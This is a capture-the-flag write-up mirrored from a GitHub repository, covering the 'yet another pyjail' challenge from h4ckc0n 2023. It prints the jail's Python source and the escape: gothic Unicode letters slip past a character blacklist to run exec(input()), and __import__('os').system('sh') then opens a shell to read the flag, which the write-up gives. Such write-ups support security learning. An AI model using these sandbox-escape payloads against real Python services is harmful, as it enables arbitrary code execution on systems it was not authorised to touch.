daffainfo
/
ctf-writeup
mirror of https://github.com/daffainfo/ctf-writeup.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
ctf-writeup/2023/h4ckc0n 2023/yet another pyjail
History
daffainfo e6c48e50f1 feat: grouped the challs 2024-01-09 16:59:32 +07:00
..
images feat: grouped the challs 2024-01-09 16:59:32 +07:00
README.md feat: grouped the challs 2024-01-09 16:59:32 +07:00

README.md

yet another pyjail

CTFs without jails are boooring, innit?

About the Challenge

This is a classic PyJail chall where we need to escape from the sandbox to obtain the flag. We got a python file that looks like this

import ast, code, sys
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFHJKLMNOPQRSTUVWXYZ1234567890" 

entry=r"""
Welcome, enjoy your stay...

     \                  ###########                  /
      \                  #########                  /
       \                                           /
        \                                         /
         \                                       /
          \                                     /
           \                                   /
            \_________________________________/
            |                                 |
            |                                 |
            |                                 |
            |            _________            |
            |           |         |           |
            |           |   ___   |           |
            |           I  |___|  |           |
            |           |         |           |
            |           |         |           |
            |           |        _|           |
            |           |       |#|           |  ;,
    -- ___  |           |         |           |   ;'
    H*/   ` |           |         |      _____|    .,`
    */     )|           I         |     \_____\     ;'
    /___.,';|           |         |     \\     \     ."`
    |     ; |___________|_________|______\\     \      ;:
    | ._,'  /                             \\     \      .
    |,'    /                               \\     \
    ||    /                                 \\_____\
    ||   /                                   \_____|
    ||  /              ___________                \
    || /              / =====o    |                \
    ||/              /  |   /-\   |                 \
    //              /   |         |                  \
   //              /    |   ____  |______             \
  //              /    (O) |    | |      \             \
 //              /         |____| |  0    \             \
//              /          o----  |________\             \
/              /                  |     |  |              \
              /                   |        |               \
             /                    |        |             
            /                     |        |

"""

bye = """
Goodbye.


        _.---,._,'
       /' _.--.<
         /'     `'
       /' _.---._____
       \.'   ___, .-'`
           /'    \\             
         /'       `-.          
        |                       
        |                   .-'~~~`-.
        |                 .'         `.
        |                 |  R  I  P  |
        |                 |           |
        |                 |           |
         \               \\|           |//
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"""

def console_exit():
    print(bye)
    raise SystemExit

def read_input(args):
    inp = input('>>> ') 
    if len(inp) > 20:
        print("input too long")
        exit()
    if "Attribute" in ast.dump(ast.parse(inp)):
        print("no attribute access allowed")
        exit()
    if "Subscript" in ast.dump(ast.parse(inp)):
        print("no indexing allowed")
        exit()
    for i in blacklist:
        if i in inp:
            print("input contained blaclisted characters")
            exit()
    return inp

while True:
    print(entry)
    try:
        code.interact(banner="", exitmsg=None, local={"exit": console_exit}, readfunc=read_input)
    except SystemExit:
        break
    print(bye)
    break

There are some restrictions like we can't input a-zA-Z0-9 and the len(input) > 20

How to Solve?

We still can bypass the blacklist by using a gothic font or cursive font and then run this code to bypass the length restriction

𝔢𝔵𝔢𝔠(𝔦𝔫𝔭𝔲𝔱())

And then use __import__ to import os pkg to spawn a shell

__import__("os").system("sh")

And to read the flag, run this shell command

cat flag.txt

flag

d4rk{1n_1996_4ndy_dufr35n3_35c4p3d_fr0m_5h4w5h4nk_pr150n}c0de